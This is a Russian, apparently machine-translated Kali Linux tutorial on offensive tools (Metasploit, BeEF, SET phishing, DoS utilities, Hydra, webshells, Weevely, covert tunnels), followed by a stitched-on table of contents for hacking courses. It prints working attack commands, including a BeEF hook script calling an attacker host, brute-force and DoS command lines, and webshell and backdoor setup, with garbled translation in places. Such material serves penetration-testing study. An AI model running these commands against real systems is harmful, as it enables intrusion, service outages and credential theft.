В консоли, если вы используете помощь или? Символ, он покажет вам список с командами MSP вместе с их описанием. Вы можете выбрать в зависимости от ваших потребностей и того, что вы будете использовать.

Консоль Символ

Еще одна важная административная команда – msfupdate, которая помогает обновить metasploit последними уязвимостями. После запуска этой команды в консоли вам придется подождать несколько минут до завершения обновления.

MSFUpdate

У него есть хорошая команда под названием «Поиск», которую вы можете использовать, чтобы найти то, что вы хотите, как показано на следующем снимке экрана. Например, я хочу найти эксплойты, связанные с Microsoft, и команда может быть msf> search name: Microsoft type: exploit .

Где «поиск» – это команда, «имя» – это имя объекта, который мы ищем, а «тип» – это тип сценария, который мы ищем.

Команда поиска

Другая команда – «информация». Он предоставляет информацию относительно модуля или платформы, где он используется, кто является автором, ссылку на уязвимость и ограничение полезной нагрузки, которое это может иметь.

Команда информации

Армитаж

Armitage GUI для metasploit – это дополнительный инструмент для metasploit. Он визуализирует цели, рекомендует эксплойты и предоставляет расширенные функции после эксплуатации.

Давайте откроем его, но сначала надо открыть и запустить metasploit консоль. Чтобы открыть Armitage, перейдите в Приложения → Инструменты эксплойта → Armitage.

Армитаж

Нажмите кнопку « Подключиться» , как показано на следующем снимке экрана.

соединять

Когда он откроется, вы увидите следующий экран.

Удобный

Armitage является дружественным к пользователю. В области «Цели» перечислены все машины, которые вы обнаружили и с которыми работаете, взломанные цели имеют красный цвет с грозой на нем.

После того, как вы взломали цель, вы можете щелкнуть по ней правой кнопкой мыши и продолжить изучение того, что вам нужно сделать, например, изучить (просмотреть) папки.

исследование

В следующем графическом интерфейсе вы увидите представление для папок, которое называется консолью. Просто нажимая на папки, вы можете перемещаться по папкам без необходимости использования команд metasploit.

Справа от GUI находится раздел, в котором перечислены модули уязвимостей.

Консольная папка

говяжий

BeEF расшифровывается как « Эксплуатация браузера» . Это инструмент для тестирования на проникновение, ориентированный на веб-браузер. BeEF позволяет профессиональному тестеру проникновения оценить фактическое состояние безопасности целевой среды, используя векторы атак на стороне клиента.

Сначала вы должны обновить пакет Kali, используя следующие команды:

root@kali:/# apt-get update  
root@kali:/# apt-get install beef-xss 

Для запуска используйте следующую команду –

root@kali:/# cd /usr/share/beef-xss  
root@kali:/# ./beef 

Кали Пакет

Откройте браузер и введите имя пользователя и пароль: beef .

Открыть браузер

Хук BeEF – это файл JavaScript, размещенный на сервере BeEF, который необходимо запустить в клиентских браузерах. Когда это происходит, он перезванивает на сервер BeEF и передает много информации о цели. Это также позволяет запускать дополнительные команды и модули к цели. В этом примере местоположение ловушки BeEF находится по адресу http://192.168.1.101:3000/hook.js .

Чтобы атаковать браузер, включите хук JavaScript на странице, которую будет просматривать клиент. Есть несколько способов сделать это, однако самый простой – вставить следующее на страницу и каким-то образом заставить клиента открыть ее.

<script src = "http://192.168.1.101:3000/hook.js" type = "text/javascript"></script> 

После загрузки страницы вернитесь на панель управления BeEF и нажмите «Онлайн-браузеры» в левом верхнем углу. Через несколько секунд вы увидите всплывающее окно с IP-адресом, представляющее подключенный браузер. Наведя указатель мыши на IP, вы быстро получите информацию, такую ​​как версия браузера, операционная система и установленные плагины.

Загрузка страницы

Чтобы выполнить команду удаленно, нажмите «Owned» хост. Затем по команде щелкните модуль, который вы хотите выполнить, и, наконец, нажмите «Выполнить».

Запустить удаленно

Linux Exploit Suggester

Он предлагает возможные эксплойты, учитывая версию выпуска «uname -r» операционной системы Linux.

Чтобы запустить его, введите следующую команду –

root@kali:/usr/share/linux-exploit-suggester# ./Linux_Exploit_Suggester.pl -k 3.0.0

3.0.0 – это версия ядра ОС Linux, которую мы хотим использовать.

Версия ядра

Kali Linux – инструменты криминалистики

В этой главе мы узнаем об инструментах судебной экспертизы, доступных в Kali Linux.

p0f

p0f – это инструмент, который может идентифицировать операционную систему целевого хоста, просто изучая захваченные пакеты, даже если рассматриваемое устройство находится за брандмауэром пакетов. P0f не генерирует никакого дополнительного сетевого трафика, прямого или косвенного; без поиска имени; нет загадочных зондов; нет запросов ARIN; ничего такого. В руках опытных пользователей P0f может обнаружить наличие брандмауэра, использование NAT и наличие балансировщиков нагрузки.

Наберите «p0f – h» в терминале, чтобы увидеть, как его использовать, и вы получите следующие результаты.

Целевой Хост

Опытные пользователи

Это перечислит даже доступные интерфейсы.

Доступный интерфейс

Затем введите следующую команду: «p0f –i eth0 –p -o filename» .

Где параметр “-i” – это имя интерфейса, как показано выше. «-p» означает, что он находится в беспорядочном режиме. «-o» означает, что вывод будет сохранен в файле.

Тип команды

Откройте веб-страницу с адресом 192.168.1.2

Адрес веб-страницы

Из результатов видно, что веб-сервер использует apache 2.x, а ОС – Debian.

PDF-анализатор

pdf-parser – это инструмент, который анализирует документ PDF для определения основных элементов, используемых в анализируемом файле PDF. Он не будет отображать PDF-документ. Это не рекомендуется в случае с учебниками для PDF-парсеров, однако оно выполняет свою работу. Обычно это используется для PDF-файлов, в которые, как вы подозреваете, встроен скрипт.

Команда –

pdf-parser  -o 10 filepath

где “-o” – количество объектов.

Номер объекта

Как вы можете видеть на следующем снимке экрана, файл PDF открывает команду CMD.

CMD Command

Dumpzilla

Приложение Dumpzilla разработано в Python 3.x и предназначено для извлечения всей криминалистической информации о браузерах Firefox, Iceweasel и Seamonkey для анализа.

ddrescue

Он копирует данные из одного файла или блочного устройства (жесткий диск, компакт-диск и т. Д.) В другой, пытаясь спасти вначале хорошие части в случае ошибок чтения.

Основная операция ddrescue полностью автоматическая. То есть вам не нужно ждать ошибки, останавливать программу, перезапускать ее с новой позиции и т. Д.

Если вы используете функцию mapfile в ddrescue, данные спасаются очень эффективно (считываются только необходимые блоки). Кроме того, вы можете прервать спасение в любое время и возобновить его позже в той же точке. Файл карты является неотъемлемой частью эффективности ddrescue. Используйте его, если вы не знаете, что делаете.

Командная строка –

dd_rescue infilepath  outfilepath

Параметр «–v» означает многословный. «/ dev / sdb» – это папка, которую нужно спасти. IMG-файл – это восстановленное изображение.

Восстановленное изображение

DFF

Это еще один судебный инструмент, используемый для восстановления файлов. У него тоже есть графический интерфейс. Чтобы открыть его, введите «dff-gui» в терминале, и откроется следующий веб-интерфейс.

DFF GUI

Нажмите Файл → «Открыть доказательства».

Открытое доказательство

Следующая таблица откроется. Отметьте «Raw format» и нажмите «+», чтобы выбрать папку, которую вы хотите восстановить.

Сырой формат

Затем вы можете просмотреть файлы в левой части панели, чтобы увидеть, что было восстановлено.

Просмотр файла

Kali Linux – Социальная инженерия

В этой главе мы узнаем об инструментах социальной инженерии, используемых в Kali Linux.

Использование инструментария социальной инженерии

Social-Engineer Toolkit (SET) – это среда тестирования на проникновение с открытым исходным кодом, разработанная для социальной инженерии. У SET есть несколько пользовательских векторов атаки, которые позволяют вам сделать правдоподобную атаку за короткий промежуток времени. Эти инструменты используют человеческое поведение, чтобы обмануть их в направлениях атаки.

Давайте узнаем, как использовать Social Engineer Toolkit.

Шаг 1 – Чтобы открыть SET, перейдите в Приложения → Инструменты социальной инженерии → Нажмите «SET» Инструмент социальной инженерии.

Инструменты социальной инженерии

Шаг 2 – Он спросит, согласны ли вы с условиями использования. Введите «y», как показано на следующем снимке экрана.

Тип Y

Шаг 3 – Большинство меню, показанных на следующем скриншоте, самоочевидны, и среди них наиболее важным является номер 1 «Атаки социальной инженерии».

Сам объяснил

Шаг 4 – Введите «1» → Enter. Подменю откроется. Если вы нажмете кнопку Enter еще раз, вы увидите объяснения для каждого подменю.

Модуль Spear-phishing позволяет вам специально создавать сообщения электронной почты и отправлять их целевым жертвам с прикрепленными полезными нагрузками FileFormatmalicious . Например, отправка вредоносного PDF-документа, который, если жертва откроется, скомпрометирует систему. Если вы хотите подделать свой адрес электронной почты, убедитесь, что «Sendmail» установлен (apt-get install sendmail) и измените флаг config / set_config SENDMAIL = OFF на SENDMAIL = ON.

Есть два варианта фишинг-атаки:

  • Провести массовую атаку по электронной почте
  • Создайте полезную нагрузку FileFormat и шаблон социальной инженерии

Первый позволяет SET сделать все за вас (вариант 1), второй – создать собственную полезную нагрузку FileFormat и использовать ее в своей собственной атаке.

Третья вечеринка

Введите «99», чтобы вернуться в главное меню, а затем «2», чтобы перейти к «Векторам веб-атаки».

Модуль веб-атаки – это уникальный способ использования нескольких веб-атак для компрометации предполагаемой жертвы. Этот модуль используется для выполнения фишинговых атак против жертвы, если они нажимают на ссылку. Существует большое разнообразие атак, которые могут произойти после нажатия на ссылку.

Мульти Атака

Введите «99», чтобы вернуться в главное меню, а затем введите «3» .

Заразительный модуль USB / CD / DVD создаст файл autorun.inf и полезную нагрузку Metasploit. Файл полезной нагрузки и автозапуска записывается или копируется на USB. Когда DVD / USB / CD вставлен в компьютер жертвы, он активирует функцию автозапуска (если автозапуск включен) и, возможно, скомпрометирует систему. Вы можете выбрать вектор атаки, который хотите использовать: ошибки формата файла или прямой исполняемый файл.

Ниже приведены параметры для Генератор инфекционных медиа.

  • Эксплойты формата файла
  • Стандартный исполняемый файл Metasploit

инфекционный

Введите «99», чтобы вернуться в главное меню. Затем введите «4», чтобы перейти к «Векторам веб-атак».

Создание полезной нагрузки и слушателя – это простой способ создания полезной нагрузки Metasploit. Он экспортирует исполняемый файл для вас и сгенерирует слушателя. Вам нужно будет убедить жертву скачать exe-файл и выполнить его, чтобы получить оболочку.

Создать полезную нагрузку

Введите «99», чтобы вернуться в главное меню, а затем «5», чтобы перейти к «Векторам веб-атак».

Вектор веб-атаки

Массовая атака по почте позволит вам отправлять несколько писем жертвам и настраивать сообщения. На массовом электронном почтовом ящике есть два варианта; Во-первых, отправьте электронное письмо на один адрес электронной почты. Второй вариант позволяет вам импортировать список, содержащий все электронные письма получателей, и он будет отправлять ваше сообщение столько людей, сколько вы хотите в этом списке.

  • E-Mail Attack Единый адрес электронной почты
  • E-Mail Attack Mass Mailer

Введите «99», чтобы вернуться в главное меню, а затем введите «9», чтобы перейти к «Вектору атаки Powershell».

Powershell

Модуль Powershell Attack Vector позволяет создавать атаки, специфичные для PowerShell. Эти атаки позволяют использовать PowerShell, который доступен по умолчанию во всех операционных системах Windows Vista и выше. PowerShell обеспечивает плодотворную среду для развертывания полезных нагрузок и выполнения функций, которые не запускаются профилактическими технологиями.

  • Буквенно-цифровой инжектор Shellcode Powershell
  • Powershell Reverse Shell
  • Powershell Bind Shell
  • База данных SAM Powershell Dump

Kali Linux – инструменты для подчеркивания

Инструменты стресса используются для создания DoS-атак или для создания стресс-теста для различных приложений, чтобы принять соответствующие меры на будущее.

Все инструменты стресс-тестирования находятся в разделе Приложения → Анализ уязвимостей → Стресс-тестирование.

Анализ уязвимостей

Все стресс-тесты будут проводиться на работоспособной машине с IP-адресом 192.168.1.102.

Стресс-тестирование

Slowhttptest

Slowhttptest является одним из инструментов атаки DoS. Он особенно использует протокол HTTP для соединения с сервером и для сохранения ресурсов, таких как процессор и оперативная память. Давайте посмотрим подробно, как его использовать и объясним его функции.

Чтобы открыть slowhttptest, сначала откройте терминал и введите «slowhttptest –parameters» .

Вы можете набрать «slowhttptest –h», чтобы увидеть все параметры, которые вам нужно использовать. Если вы получаете вывод «Команда не найдена», вы должны сначала набрать «apt-get install slowhttptest» .

Показать Http Test

Команда не найдена

Затем после установки снова введите slowhttptest –h

Медленные Заголовки

Введите следующую команду –

slowhttptest -c 500 -H -g -o outputfile -i 10 -r 200 -t GET –u 
http://192.168.1.202/index.php -x 24 -p 2

Куда,

  • (-c 500) = 500 соединений

  • (-H) = режим Slowloris

  • -g = генерировать статистику

  • -o outputfile = имя выходного файла

  • -i 10 = использовать 10 секунд для ожидания данных

  • -r 200 = 200 соединений с -t GET = GET-запросами

  • -u http://192.168.1.202/index.php = целевой URL

  • -x 24 = максимальная длина 24 байта

  • -p 2 = время ожидания 2 секунды

(-c 500) = 500 соединений

(-H) = режим Slowloris

-g = генерировать статистику

-o outputfile = имя выходного файла

-i 10 = использовать 10 секунд для ожидания данных

-r 200 = 200 соединений с -t GET = GET-запросами

-u http://192.168.1.202/index.php = целевой URL

-x 24 = максимальная длина 24 байта

-p 2 = время ожидания 2 секунды

Время в секундах

После запуска теста выходные данные будут такими, как показано на следующем снимке экрана, где вы можете заметить, что сервис доступен.

Тест начинается

Через некоторое время, при соединении 287, сервис перестает работать. Это означает, что сервер может обрабатывать не более 287 HTTP-соединений.

соединение

Inviteflood

Inviteflood – это сообщение SITE / SDP INVITE, передаваемое по UDP / IP. Он работает на различных дистрибутивах Linux. Он выполняет DoS (отказ в обслуживании) атаки на SIP-устройства, отправляя несколько запросов INVITE.

Чтобы открыть Inviteflood, сначала откройте терминал и введите «Inviteflood –parameters»

Для получения справки вы можете использовать «Inviteflood –h»

Пригласить Потоп

Далее вы можете использовать следующую команду –

inviteflood eth0 target_extension  target_domain target_ip number_of_packets

Куда,

  • target_extension is 2000

  • target_domain – 192.168.xx

  • target_ip – 192.168.xx

  • число_пакетов равно 1

  • -a является псевдонимом SIP-аккаунта

target_extension is 2000

target_domain – 192.168.xx

target_ip – 192.168.xx

число_пакетов равно 1

-a является псевдонимом SIP-аккаунта

Целевое исполнение

Iaxflood

Iaxflood – это инструмент VoIP DoS. Чтобы открыть его, введите «iaxflood sourcename destinationname numpackets» в терминале.

Чтобы узнать, как использовать, введите «iaxflood –h»

Iaxflood

THC-SSL-DOS

THC-SSL-DOS – это инструмент для проверки производительности SSL. Установка безопасного SSL-соединения требует в 15 раз больше вычислительной мощности на сервере, чем на клиенте. THCSSL-DOS использует это асимметричное свойство, перегружая сервер и отключая его от Интернета.

Ниже приводится команда –

thc-ssl-dos victimIP httpsport –accept 

В этом примере это будет –

thc-ssl-dos 192.168.1.1 443 –accept 

Его вывод будет следующим:

Производительность SSL

Ошибка SSL

Kali Linux – нюхает и спуфинг

Основная концепция инструментов сниффинга так же проста, как прослушивание телефонных разговоров, и в Kali Linux есть несколько популярных инструментов для этой цели. В этой главе мы узнаем об инструментах прослушивания и спуфинга, доступных в Kali.

Burpsuite

Burpsuite можно использовать в качестве инструмента отслеживания между вашим браузером и веб-серверами, чтобы найти параметры, которые использует веб-приложение.

Чтобы открыть Burpsuite, выберите Приложения → Анализ веб-приложений → Burpsuite.

Веб-анализ

Для настройки сниффинга мы настраиваем burpsuite для работы в качестве прокси. Для этого перейдите в Параметры, как показано на следующем снимке экрана. Установите флажок, как показано.

В этом случае IP-адрес прокси-сервера будет 127.0.0.1 с портом 8080.

IP прокси

Затем настройте прокси-сервер браузера, который является IP-адресом компьютера burpsuite и порта.

Настроить браузер

Чтобы начать перехват, перейдите в Прокси → Перехват → нажмите «Перехват включен».

Продолжайте перемещаться по веб-странице, где вы хотите найти параметр для проверки на уязвимости.

перехват

В данном случае это метастабильная машина с IP 192.168.1.102

IP машины

Перейдите в раздел «История HTTP». На следующем скриншоте строка, отмеченная красной стрелкой, показывает последний запрос. В Raw и скрытый параметр, такой как идентификатор сеанса, и другие параметры, такие как имя пользователя и пароль, подчеркнуты красным.

Параметр запроса

mitmproxy

mitmproxy – это HTTP-прокси-сервер типа «человек посередине» с поддержкой SSL. Он предоставляет консольный интерфейс, который позволяет проверять и редактировать потоки трафика на лету.

Чтобы открыть его, перейдите в терминал и введите «mitmproxy -parameter», а для получения справки по командам введите «mitmproxy –h» .

Mitmproxy

Чтобы запустить mitmproxy, введите «mitmproxy –p portnumber» . В данном случае это «mitmproxy –p 80».

Номер порта

Wireshark

Wireshark – один из лучших анализаторов пакетов данных. Он глубоко анализирует пакеты на уровне кадра. Вы можете получить больше информации о Wireshark на их официальной веб-странице: https://www.wireshark.org/ . В Кали это можно найти по следующему пути – Приложения → Обнюхивание и спуфинг → Wireshark.

Wireshark

Как только вы нажмете wireshark, откроется следующий графический интерфейс.

Wireshark GUI

Нажмите «Пуск», и захват пакета начнется, как показано на следующем снимке экрана.

Захват пакетов

SSLstrip

sslstrip – это MITM-атака, которая заставляет браузер жертвы обмениваться текстовыми сообщениями по HTTP, а прокси-серверы изменяют содержимое с HTTPS-сервера. Для этого sslstrip «удаляет» https: // URL-адреса и превращает их в http: // URL-адреса.

Чтобы открыть его, перейдите в Приложения → 09-Sniffing & Spoofing → Spoofing и MITM → sslstrip.

Подделка

Применение MITM

Чтобы настроить его, напишите, чтобы переслать все 80-портовое соединение на 8080.

Порт Коммунация

Затем запустите команду sslstrip для необходимого порта.

Команда SSLtrip

Kali Linux – Инструменты для взлома паролей

В этой главе мы узнаем о важных инструментах взлома паролей, используемых в Kali Linux.

гидра

Hydra – это взломщик входа в систему, поддерживающий множество протоколов для атаки (Cisco AAA, Cisco auth, Cisco enable, CVS, FTP, HTTP (S) -FORM-GET, HTTP (S) -FORM-POST, HTTP (S) -GET, HTTP (S) -HEAD, HTTP-прокси, ICQ, IMAP, IRC, LDAP, MS-SQL, MySQL, NNTP, Oracle Listener, Oracle SID, PC-Anywhere, PC-NFS, POP3, PostgreSQL, RDP, Rexec, Rlogin , Rsh, SIP, SMB (NT), SMTP, перечисление SMTP, SNMP v1 + v2 + v3, SOCKS5, SSH (v1 и v2), SSHKEY, Subversion, Teamspeak (TS2), Telnet, VMware-Auth, VNC и XMPP) ,

Чтобы открыть его, перейдите в Приложения → Парольные атаки → Онлайн-атаки → Гидра.

гидра

Откроется консоль терминала, как показано на следующем снимке экрана.

Открытый терминал

В этом случае мы будем использовать службу FTP-метастабильной машины с IP-адресом 192.168.1.101.

Грубая сила

Мы создали в Кали список слов с расширением «lst» по пути usr share wordlist metasploit .

Поделиться Wordlist

Команда будет выглядеть следующим образом:

hydra -l /usr/share/wordlists/metasploit/user -P 
/usr/share/wordlists/metasploit/ passwords ftp://192.168.1.101 –V 

где –V – имя пользователя и пароль при попытке

Гидра Командование

Как показано на следующем снимке экрана, имя пользователя и пароль найдены как msfadmin: msfadmin

Пароль администратора

Джонни

Johnny – это графический интерфейс для инструмента взлома паролей John the Ripper. Как правило, он используется для слабых паролей.

Чтобы открыть его, перейдите в Приложения → Парольные атаки → Джонни.

Джонни

В этом случае мы получим пароль машины Kali следующей командой, и на рабочем столе будет создан файл.

рабочий стол

Нажмите «Открыть файл Passwd» → OK, и все файлы будут показаны, как показано на следующем снимке экрана.

Открыть файл

Нажмите «Начать атаку».

Начать атаку

После того, как атака будет завершена, нажмите на левой панели в «Пароли», и пароль будет не затенен.

контурный

Джон

Джон является версией командной строки Johnny GUI. Чтобы запустить его, откройте Терминал и введите «Джон» .

Unshadowing

В случае скрытия пароля нам нужно написать следующую команду:

root@kali:~# unshadow passwd shadow > unshadowed.txt 

RainbowCrack

Программное обеспечение RainbowCrack взламывает хэши путем поиска по радужной таблице. Радужные таблицы – это обычные файлы, хранящиеся на жестком диске. Как правило, таблицы Rainbow покупаются онлайн или могут быть скомпилированы с использованием различных инструментов.

Чтобы открыть его, перейдите в «Приложения» → «Атаки паролем» → нажмите «rainbowcrack».

RainbowCrack

Команда для взлома хеш-пароля –

rcrack path_to_rainbow_tables -f path_to_password_hash 

SQLdict

Это инструмент атаки по словарю для SQL-сервера, который очень прост и прост в использовании. Чтобы открыть его, откройте терминал и введите «sqldict» . Откроется следующий вид.

Sql Dict

В поле «Target IP Server» введите IP-адрес сервера, на котором находится SQL. В разделе «Целевая учетная запись» введите имя пользователя. Затем загрузите файл с паролем и нажмите «Пуск», пока он не закончится.

хеш-идентификатор

Это инструмент, который используется для определения типов хэшей, то есть для чего они используются. Например, если у меня есть HASH, он может сказать мне, является ли это HASH для Linux или Windows.

Хэш-идентификатор

На приведенном выше экране показано, что это может быть хеш-код MD5, и он выглядит как кэшированные учетные данные домена.

Kali Linux – поддержка доступа

В этой главе мы увидим инструменты, которые Kali использует для поддержания соединения и доступа к взломанному компьютеру, даже когда он снова подключается и отключается.

Powersploit

Это инструмент для Windows-машин. В машине жертвы установлен PowerShell. Этот инструмент помогает хакеру подключиться к компьютеру жертвы через PowerShell.

Чтобы открыть его, откройте терминал слева и введите следующую команду для входа в папку powersploit –

cd /usr/share/powersploit/ 

Если вы введете «ls», в нем будут перечислены все инструменты powersploit, которые вы можете загрузить и установить на компьютере жертвы после получения доступа. Большинство из них самоочевидны по именам.

Powersploit

Простой способ загрузить этот инструмент на компьютер жертвы – создать веб-сервер, который позволяют легко создавать инструменты powersploit, используя следующую команду:

python -m SimpleHTTPServer 

Скачать инструмент

После этого, если вы введете: http: // <Kali machine ip_address>: 8000 / следующий результат.

Справочник Листимг

Sbd

sbd – это инструмент, похожий на Netcat. Это портативное устройство и может использоваться на машинах Linux и Microsoft. sbd поддерживает шифрование AES-CBC-128 + HMAC-SHA1> По сути, оно помогает в любой момент подключиться к компьютеру жертвы через определенный порт и удаленно отправлять команды.

Чтобы открыть его, перейдите в терминал и введите «sbd -l -p port», чтобы сервер принимал соединения.

Принятие соединения

В этом случае давайте разместим порт 44, где сервер будет слушать.

Порт Порт

На сайте жертвы введите «sbd IPofserver port» . Будет установлено соединение, по которому мы сможем отправлять удаленные команды.

В данном случае это «localhost», поскольку мы выполнили тест на той же машине.

Ipofserver

Наконец, на сервере вы увидите, что произошло соединение, как показано на следующем снимке экрана.

Подключение к серверу

Webshells

Webshells могут быть использованы для поддержания доступа или взлома веб-сайта. Но большинство из них выявляются антивирусами. Оболочка php C99 очень хорошо известна среди антивирусов. Любой распространенный антивирус легко обнаружит его как вредоносное ПО.

Как правило, их основной функцией является отправка системной команды через веб-интерфейсы.

Чтобы открыть его, введите «cd / usr / share / webshells /» в терминале.

Webshell

Как видите, они разделены на классы в соответствии с языком программирования: asp, aspx, cfm, jsp, perl, php

Если вы войдете в папку PHP, вы увидите все веб-оболочки для веб-страниц php.

скоросшиватель

Чтобы загрузить оболочку на веб-сервер, например «simple-backdoor.php», откройте веб-страницу и URL-адрес веб-оболочки.

В конце напишите команду cmd. У вас будет вся информация, показанная на следующем скриншоте.

Написать команду

Weevely

Weevely – это PHP-оболочка, которая имитирует соединение, подобное telnet. Это инструмент для пост-эксплуатации веб-приложений, который можно использовать в качестве скрытого бэкдора или веб-оболочки для управления законными веб-аккаунтами, даже бесплатными.

Чтобы открыть его, перейдите к терминалу и введите «weelyly», где вы можете увидеть его использование.

Weevely

Чтобы сгенерировать оболочку, введите «weevely generate password pathoffile» . Как видно на следующем снимке экрана, он создается в папке «Рабочий стол» и файл должен быть загружен на веб-сервер для получения доступа.

Создать оболочку

После загрузки веб-оболочки, как показано на следующем снимке экрана, мы можем подключиться с помощью cmd к серверу с помощью команды «пароль URL-адреса вежливого времени», где вы можете увидеть, что сеанс начался.

Загрузка файла

HTTP-туннель

http-tunnel создает двунаправленный виртуальный поток данных, туннелированный в HTTP-запросах. При желании запросы могут быть отправлены через HTTP-прокси. Это может быть полезно для пользователей за ограничительными межсетевыми экранами. Если доступ через WWW разрешен через HTTP-прокси, можно использовать http-туннель и telnet или PPP для подключения к компьютеру за пределами брандмауэра.

Сначала мы должны создать туннельный сервер с помощью следующей команды:

httptunnel_server –h 

Затем на клиентском сайте введите «httptunnel_client –h», и оба начнут принимать подключения.

dns2tcp

Это снова инструмент туннелирования, который помогает передавать трафик TCP через трафик DNS, что означает порт UDP 53.

Чтобы запустить его, введите «dns2tcpd» . Использование объясняется, когда вы откроете скрипт.

DNSTcp

На сайте сервера введите эту команду для настройки файла.

#cat >>.dns2tcpdrc
<&l;END listen = 0.0.0.0 
port = 53 user=nobody 
chroot = /root/dns2tcp 
pid_file = /var/run/dns2tcp.pid 
domain = your domain key = secretkey 
resources = ssh:127.0.0.1:22 
END 
#dns2tcpd -f .dns2tcpdrc

На сайте клиента введите эту команду.

# cat >>.dns2tcprc 
<<END domain = your domain 
resource = ssh 
local_port = 7891 
key = secretkey 
END
# dns2tcpc -f .dns2tcprc 
# ssh root@localhost -p 7891 -D 7076 

Туннелирование начнется с этой команды.

Cryptcat

Это еще один инструмент, такой как Netcat, который позволяет устанавливать зашифрованное соединение TCP и UDP с машиной жертвы.

Чтобы запустить сервер для прослушивания соединения, введите следующую команду –

cryptcat –l –p port –n 

Cryptcat

Куда,

  • -l означает прослушивание соединения

  • -p обозначает параметр номера порта

  • -n означает не делать разрешение имени

-l означает прослушивание соединения

-p обозначает параметр номера порта

-n означает не делать разрешение имени

На клиентском сайте команда подключения называется «cryptcat IPofServer PortofServer»

Порт сервера

Kali Linux – обратный инжиниринг

В этой главе мы узнаем об инструментах обратного проектирования Kali Linux.

OllyDbg

OllyDbg – это 32-разрядный анализатор уровня отладчика для приложений Microsoft Windows. Акцент на анализе двоичного кода делает его особенно полезным в тех случаях, когда источник недоступен. Как правило, он используется для взлома коммерческого программного обеспечения.

Чтобы открыть его, перейдите в Приложения → Реверс Инжиниринг → ollydbg

OllyDbg

Чтобы загрузить EXE-файл, перейдите в «Открывающую папку» желтого цвета, которая показана красным квадратом на снимке экрана выше.

После загрузки у вас будет следующий вид, где вы можете изменить двоичные файлы.

Бинарные

dex2jar

Это приложение, которое помогает конвертировать APK-файл (android) в JAR-файл для просмотра исходного кода. Чтобы использовать его, откройте терминал и напишите «d2j-dex2jar –d / file location» .

В этом случае файл «classes.dex» на рабочем столе.

Классы

Следующая строка показывает, что файл JAR был создан.

Jar File

Созданный файл

JD-GUI

JD-GUI – это отдельная графическая утилита, которая отображает исходные коды Java файлов «.class» . Вы можете просмотреть восстановленный исходный код. В этом случае мы можем восстановить файл, который мы извлекли из инструмента dex2jar.

Чтобы запустить его, откройте терминал и напишите «jd-gui», и откроется следующий вид.

Чтобы импортировать файл, нажмите на открытую папку Открыть папку значок в левом верхнем углу, а затем импортируйте файл.

Jd Gui

apktool

Apktool является одним из лучших инструментов, чтобы полностью изменить приложение для Android. Он может декодировать ресурсы практически до первоначальной формы и восстанавливать их после внесения изменений.

Чтобы открыть его, перейдите в терминал и напишите «apktool» .

Чтобы декомпилировать файл apk, напишите «apktool d apk file» .

Apktool

Декомпиляция начнется, как показано на следующем снимке экрана.

Декомпилирование

Kali Linux – Инструменты отчетности

В этой главе мы узнаем о некоторых инструментах отчетности в Kali Linux.

Dradis

Во всей этой работе, которую мы выполнили, важно делиться полученными результатами, отслеживать нашу работу и т. Д. Для этого у Kali есть инструмент отчетности, называемый dradis, который является веб-службой.

Шаг 1 – Чтобы запустить Dradis, введите «service dradis start» .

Dradis

Шаг 2 – Чтобы открыть, перейдите в Приложения → Инструменты отчетности → dradis.

Составление отчетов

Веб-URL откроется. Любой человек в локальной сети может открыть его по следующему адресу https: // IP-адрес компьютера kali: 3004

Войдите с именем пользователя и паролем, которые использовались впервые.

LAN Open

Шаг 3 – После входа в систему вы можете импортировать файлы из NMAP, NESSUS, NEXPOSE. Для этого перейдите в «Импорт из файла» → нажмите «Новый импортер (с обратной связью в реальном времени)».

Импорт в реальном времени

Шаг 4 – Выберите тип файла, который вы хотите загрузить. В данном случае это «сканирование Nessus» → нажмите «Обзор».

Менеджер загрузок

Если вы сейчас перейдете на домашнюю страницу, на левой панели вы увидите, что импортированные сканы находятся в папке с данными о хосте и порте.

Детали порта

Metagoofil

Metagoofil выполняет поиск в Google для выявления и загрузки документов на локальный диск, а затем извлекает метаданные. Извлекает метаданные из публичных документов, принадлежащих конкретной компании, частному лицу, объекту и т. Д.

Чтобы открыть его, перейдите по ссылке : «usr / share / metagoofil /» .

Metagoofil

Чтобы начать поиск, введите следующую команду –

python metagoofil.py 

Вы можете использовать следующие параметры с этой командой –

  • –D (доменное имя)

  • –T (тип файла для загрузки dox, pdf и т. Д.)

  • –L (ограничить результаты 10, 100)

  • –N (ограничить количество скачиваемых файлов)

  • –O (место для сохранения файлов)

  • –F (выходной файл)

–D (доменное имя)

–T (тип файла для загрузки dox, pdf и т. Д.)

–L (ограничить результаты 10, 100)

–N (ограничить количество скачиваемых файлов)

–O (место для сохранения файлов)

–F (выходной файл)

В следующем примере показано, что скрыто только доменное имя.

Содержание

  1. 10 лучших ресурсов для изучения хакинга с помощью Kali Linux
  2. 1. Установка Kali Linux и основы командной строки Linux.
  3. 2.Основы изучения хакинга с помощью Kali Linux и туториалы по безопасности из блога Kali Linux.
  4. 3. Взламываем любую Wi-fi сеть, с помощью Kali Linux.
  5. 4. Взлом беспроводной сети, защищённой технологиями WPA/WPA2, с помощью Kali Linux.
  6. 5. Загружаем и запускаем Kali Linux на Android устройствах.
  7. 6. Сертифицированный курс по теме несанкционированного доступа: Облегченная версия.
  8. 7. 20 вещей, которые нужно сделать после установки Kali Linux – отличная статья для начала знакомства с Kali Linux.
  9. 8. Мониторинг сети, с помощью Kali Linux.
  10. 9. Туториал по Kali Linux, на примере тестирования на предмет несанкционированного доступа.
  11. 10. Туториалы по Kali Linux.
  12. Руководство по Kali Linux 2020. Установка с сохранением данных и полная настройка системы. + Слив курса по Kali Linux
  13. Установка
  14. Запись Kali Linux 2020 Live ISO на USB
  15. Изменение размера раздела USB
  16. Создание постоянного раздела
  17. Загрузитесь в Kali 2020 Live USB
  18. Монтирование Persistence-раздела
  19. Настройка системы
  20. Установите часовой пояс
  21. Включить звук загрузки
  22. Update и Upgrade
  23. Установить новый пароль для root
  24. Добавить учетную запись с низким уровнем привилегий
  25. Установить Git
  26. Установите ваши любимые инструменты взлома
  27. Установите браузер TOR
  28. Установить Tilix
  29. Установить редактор кода
  30. Лучший хакерский курс с Kali Linux на русском языке
  31. Установка и обновление Kali Linux
  32. Удаленный взлом компьютера через интернет (часть 1)
  33. Удаленный взлом компьютера через интернет (часть 2)
  34. Что такое cookies в браузере
  35. Взлом Wi-Fi пароля WPA2
  36. Еще одно видео по взлому Wi-Fi
  37. Взлом WEB-сайтов: SQL-инъекции (часть 1)
  38. Взлом WEB-сайтов: SQL-инъекции (часть 2)
  39. Взлом пароля пользователя
  40. Как стать хакером с Kali Linux
  41. 1. Основы языков программирования
  42. 1.1 HTML
  43. 1.2 PHP
  44. 1.3 MySQL
  45. 1.4 JavaScript, JQuery
  46. 2. Основы устройства сетей, работы веб-серверов и веб-сайтов
